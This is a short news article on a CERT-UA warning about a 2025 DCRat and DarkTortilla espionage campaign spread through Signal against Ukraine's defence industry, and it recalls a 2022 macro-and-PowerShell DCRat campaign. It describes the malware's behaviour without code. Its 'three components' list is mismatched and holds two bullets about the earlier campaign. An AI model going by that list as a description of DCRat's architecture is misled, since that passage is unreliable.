CERT-UA Warns of Cyber Espionage Against Ukrainian Defense Industry

CERT-UA Warns of Cyber Espionage Against Ukrainian Defense Industry

The Computer Emergency Response Team of Ukraine (CERT-UA) has issued a warning about a sophisticated cyber espionage campaign targeting the Ukrainian defense industry, including defense-industrial complex enterprises and representatives of the Defense Forces. The campaign uses the Dark Crystal RAT (DCRat), a highly modular and customizable malware tool.

In March 2025, threat actors distributed archived messages through Signal, which contained a fake PDF report and DarkTortilla malware. The archive acted as a launcher for the DCRat remote control software tool, designed to decrypt and launch malicious payloads. CERT-UA experts noticed that some messages were sent from compromised contacts to increase trust.

The use of popular instant messaging apps on both mobile and desktop devices has broadened the attack surface, creating uncontrolled information exchange channels that bypass security measures. The Dark Crystal RAT first appeared in the threat landscape in 2018 but was redesigned and relaunched in 2019.

DCRat is written in .NET and features a modular structure, allowing affiliates to develop their own plugins using DCRat Studio, an integrated development environment (IDE). This modular architecture enables the malware to extend its functionalities for multiple malicious purposes, including surveillance, reconnaissance, information theft, DDoS attacks, and arbitrary code execution.

The Dark Crystal RAT consists of three components:

  • In June 2022, CERT-UA warned of another malware campaign targeting Ukrainian telecommunications operators with the DarkCrystal RAT. The malspam messages had the topic “Free primary legal aid” and used a password-protected attachment “Algorithm of actions of members of the family of a missing serviceman LegalAid.rar.”
  • The RAR archive analyzed by Ukrainian CERT-UA contained the document “Algorithm_LegalAid.xlsm,” which, upon opening and enabling macros, executed a PowerShell command that downloaded and ran the .NET bootloader “MSCommondll.exe.” This in turn downloaded and ran the malware DarkCrystal RAT.

CERT-UA has published Indicators of Compromise (IoCs) for the ongoing campaign. The Ukrainian government experts urge users to remain vigilant and implement robust security measures to protect themselves against this sophisticated threat.